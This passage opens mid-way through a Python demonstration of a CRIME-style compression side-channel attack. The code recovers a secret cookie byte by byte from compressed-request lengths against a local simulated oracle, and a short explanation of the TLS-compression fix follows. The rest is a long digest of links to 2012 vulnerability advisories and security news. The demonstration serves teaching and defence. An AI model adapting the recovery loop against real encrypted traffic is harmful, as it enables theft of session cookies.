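    browser appended the victim's cookie. An eavesdropper sees only the
    ciphertext length, i.e. the compressed length plus a constant."""
    request = (b"GET /" + attacker_path + b" HTTP/1.1\r\n"
               b"Host: bank.example\r\n"
               + MARKER.encode() + secret.encode() + b"\r\n\r\n")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15, 9, STRATEGY)   # raw DEFLATE
    return len(comp.compress(request) + comp.flush())


def score_guess(known: str, guess: str, oracle=compressed_request_len) -> int:
    """'Two tries': send the guess before and after the padding. A wrong guess
    yields the same literal/match symbols in a different order, so both
    requests compress to the same size. The right guess extends the LZ77
    match covering the real cookie by one byte and drops one literal, so the
    guess-first request is shorter. Returns the summed difference over PADS."""
    total = 0
    for pad in PADS:
        guess_first = (MARKER + known + guess).encode() + pad
        guess_last = (MARKER + known).encode() + pad + guess.encode()
        total += oracle(guess_last) - oracle(guess_first)
    return total


def recover_secret(length: int, oracle=compressed_request_len) -> str:
    """Recover the secret one byte at a time (2 * len(CHARSET) * len(PADS)
    requests per byte); stop early if no candidate compresses better."""
    known = ""
    for _ in range(length):
        scores = {c: score_guess(known, c, oracle) for c in CHARSET}
        best = max(scores, key=scores.get)
        if scores[best] <= 0:
            break
        known += best
    return known


if __name__ == "__main__":
    print(recover_secret(len(SECRET)))
```

The oracle returns nothing but a length, which is the point: the fix in TLS stacks and the Check Point response linked above is to disable TLS-level compression, because no amount of padding or key strength helps once attacker-controlled data and a secret share one compression context.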

+ Linux kernel 3.0.48 released
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.0.48

+ Linux Kernel 'binfmt_script.c' Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55878

Aqua Data Studio 12.0 - Big Data Performance & ETL Shell for PostgreSQL
http://www.postgresql.org/about/news/1421/

pgBadger 2.1 released
http://www.postgresql.org/about/news/1419/

Announcing Barman 1.1
http://www.postgresql.org/about/news/1418/

Status of reports on software vulnerability information
[Q3 2012 (July to September)]
http://www.ipa.go.jp/security/vuln/report/vuln2012q3.html

Vulnerability information worth checking <2012.10.23>
http://itpro.nikkeibp.co.jp/article/COLUMN/20121021/431301/?ST=security

The "remote-control virus" is an ordinary virus: looking into what it really is
"Viruses that take over PCs are nothing unusual", "the risk of infection is small"
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431561/?ST=security

Possible leak of more than 10,000 records at NetOff; service temporarily suspended
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431552/?ST=security

Microsoft settles the lawsuit over the Kelihos botnet it forced to shut down
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431502/?ST=security

SoftEther starts free distribution of software to prevent false accusations caused by remote-control viruses
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431441/?ST=security

JVNDB-2012-003925 Authentication bypass vulnerability in Apache QPID
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003925.html

JVNDB-2012-003798 Vulnerability in Adobe Flash Player that allows content to be read
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003798.html

JVNDB-2012-003797 Integer overflow vulnerability in Adobe Flash Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003797.html

JVNDB-2012-003796 Arbitrary code execution vulnerability in Adobe Flash Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003796.html

JVNDB-2012-003795 Arbitrary code execution vulnerability in Adobe Flash Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003795.html

JVNDB-2012-003794 Arbitrary code execution vulnerability in Adobe Flash Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003794.html

JVNDB-2012-003793 Arbitrary code execution vulnerability in Adobe Flash Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003793.html

JVNDB-2012-003098 Integer underflow vulnerability in the exif_entry_get_value function in exif-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003098.html

JVNDB-2012-003097 Denial of service (DoS) vulnerability in the exif_convert_utf16_to_utf8 function in exif-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003097.html

JVNDB-2012-003096 Denial of service (DoS) vulnerability in olympus/mnote-olympus-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003096.html

JVNDB-2012-003095 Denial of service (DoS) vulnerability in the exif_data_load_data function in exif-data.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003095.html

JVNDB-2012-003094 Buffer overflow vulnerability in exif-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003094.html

JVNDB-2012-003093 Denial of service (DoS) vulnerability in the exif_convert_utf16_to_utf8 function in exif-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003093.html

JVNDB-2012-003092 Denial of service (DoS) vulnerability in the exif_entry_get_value function in exif-entry.c in libexif
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003092.html

JVNDB-2012-003311 Sensitive information disclosure vulnerability in WebKit as used in multiple Apple products
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003311.html

JVNDB-2012-002693 Privilege escalation vulnerability in 64-bit operating systems and virtualization environments running on Intel CPUs
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002693.html

JVNDB-2011-004380 Authentication bypass vulnerability in the Shibboleth OpenSAML library
http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-004380.html

JVNDB-2012-003532 SQL injection vulnerability in Oracle Database Server
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003532.html

JVNDB-2012-004560 Vulnerability in Oracle Database that allows brute-force password guessing attacks
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004560.html

JVNDB-2012-003235 Denial of service (server crash) vulnerability in PostgreSQL
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003235.html

JVNDB-2012-002716 Integer overflow vulnerability in the i915_gem_execbuffer2 function in the Linux Kernel on 32-bit platforms
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002716.html

JVNDB-2012-003022 Vulnerability in the crypt_des function in FreeBSD that allows unauthorized access to be gained
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003022.html

JVNDB-2012-002895 Authentication bypass vulnerability in sql/password.c in Oracle MySQL and MariaDB
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002895.html

JVNDB-2012-003275 Integer overflow vulnerability in tiff2pdf in libtiff
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003275.html

JVNDB-2012-003942 Arbitrary code execution vulnerability in the nsHTMLSelectElement::SubmitNamesValues function in multiple Mozilla products
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003942.html

JVNDB-2012-004670 Arbitrary command execution vulnerability in scripts/dget.pl in devscripts
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004670.html

JVNDB-2012-004591 Denial of service (DoS) vulnerability in IBM WebSphere Commerce
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004591.html

JVNDB-2012-004244 Vulnerability in main/SAPI.c in PHP that allows the HTTP response splitting protection mechanism to be bypassed
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004244.html

JVNDB-2012-004675 Sensitive information disclosure vulnerability in Cumin as used in Red Hat Enterprise MRG
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004675.html

JVNDB-2012-004677 Vulnerability in Cumin as used in Red Hat Enterprise MRG that allows session keys to be guessed
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004677.html

JVNDB-2012-004679 Cross-site scripting vulnerability in Cumin as used in Red Hat Enterprise MRG
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004679.html

JVNDB-2012-004683 Cross-site request forgery vulnerability in Cumin as used in Red Hat Enterprise MRG
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004683.html

JVNDB-2012-004684 Web session hijacking vulnerability in Cumin as used in Red Hat Enterprise MRG
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004684.html

JVNDB-2012-004628 Cross-site scripting vulnerability in Google Chrome
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004628.html

JVNDB-2012-004630 Sensitive information disclosure vulnerability in the IPC implementation in Google Chrome
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004630.html

JVNDB-2012-004668 Arbitrary command execution vulnerability in scripts/dscverify.pl in devscripts
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004668.html

JVNDB-2012-004631 Pop-up blocker bypass vulnerability in Google Chrome
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004631.html

JVNDB-2012-004636 Arbitrary code execution vulnerability in the Microsoft Windows 7 kernel as used by Google Chrome
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004636.html

JVNDB-2012-004632 Double free vulnerability in libxslt as used in Google Chrome
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004632.html

JVNDB-2012-004656 Sensitive information disclosure vulnerability in condor_startd.V6/command.cpp in Condor
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004656.html

JVNDB-2012-004380 Denial of service (assertion failure and named daemon exit) vulnerability in ISC BIND
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004380.html

F5 FirePass SSL VPN Input Validation Flaw Permits Cross-Site URL Redirection Attacks
http://www.securitytracker.com/id/1027688

Cyber Security Awareness Month - Day 22: Connectors
http://isc.sans.edu/diary.html?storyid=14350

Potential Phish for Regular Webmail Accounts
http://isc.sans.edu/diary.html?storyid=14356

VU#841851 Mutiny Technology virtual appliance command injection vulnerability
http://www.kb.cert.org/vuls/id/841851

WordPress Wordfence Plugin "email" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51055/

dotProject Cross-Site Scripting and SQL Injection Vulnerabilities
http://secunia.com/advisories/51060/

SUSE update for libproxy
http://secunia.com/advisories/51048/

SUSE update for chromium
http://secunia.com/advisories/51030/

WordPress White Label CMS Plugin Cross-Site Request Forgery Vulnerability
http://secunia.com/advisories/50487/

Mutiny Unspecified Command Injection Vulnerability
http://secunia.com/advisories/51094/

Gentoo update for chromium
http://secunia.com/advisories/51079/

Gentoo update for libav
http://secunia.com/advisories/51085/

Joomla! Freestyle Support Component "prodid" SQL Injection Vulnerability
http://secunia.com/advisories/51068/

Gentoo update for bash
http://secunia.com/advisories/51086/

Debian update for tiff
http://secunia.com/advisories/51049/

Debian update for bind9
http://secunia.com/advisories/51054/

Piwik Unspecified Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51032/

IBM Proventia Management SiteProtector IEHS Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51066/

Self Service Password Unspecified LDAP Injection Vulnerability
http://secunia.com/advisories/51064/

Turbo FTP Server 1.30.823 PORT Overflow
http://cxsecurity.com/issue/WLB-2012100194

Movable Type Pro 5.13en Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100193

DropBox iOS & Android App File Theft
http://cxsecurity.com/issue/WLB-2012100192

NetBoot SQL Injection
http://cxsecurity.com/issue/WLB-2012100191

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Dotproject SQL Injection and Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/56152

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

Google Chrome Prior to 22.0.1229.79 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55676

Linux Kernel 'binfmt_script.c' Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55878

RETIRED: Joomla Kunena 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/52636

hostapd CVE-2012-4445 Message Handling Denial of Service Vulnerability
http://www.securityfocus.com/bid/55826

hostapd 'hostapd.conf' Configuration File Insecure File Permissions Vulnerability
http://www.securityfocus.com/bid/54093

IBM Eclipse Help System Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53884

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

Google Chrome Prior to 22.0.1229.94 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55867

libpng 'png_formatted_warning()' Function Off-By-One Error Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51823

Ruby CVE-2012-4522 Local File Creation Vulnerability
http://www.securityfocus.com/bid/56115

LibTIFF TIFF Image Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55673

Google Chrome Prior to 21 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/54749

Google Chrome Prior to 21.0.1180.89 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55331

Google Chrome Prior to 22.0.1229.92 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55830

FFmpeg libavcodec 'vqavideo.c' '.vaq' File Heap Memory Corruption Vulnerability
http://www.securityfocus.com/bid/53389

FFmpeg Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/51307

FFmpeg Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/51720

GNU Bash Remote Stack Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/54937

bash-doc Insecure Temporary File Creation Vulnerabilities
http://www.securityfocus.com/bid/32733

TurboFTP Server 'PORT' Command Processing Stack Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55764

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3988 Use After Free Denial of Service Vulnerability
http://www.securityfocus.com/bid/55931

Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
http://www.securityfocus.com/bid/56171

xlockmore 'dclock' Mode Security Bypass Vulnerability
http://www.securityfocus.com/bid/56169

libsocialweb CVE-2012-4511 Non-SSL Connection Man in The Middle Vulnerability
http://www.securityfocus.com/bid/56167

Mutiny CVE-2012-3001 Command Injection Vulnerability
http://www.securityfocus.com/bid/56165

Self Service Password Unspecified LDAP Injection Vulnerability
http://www.securityfocus.com/bid/56163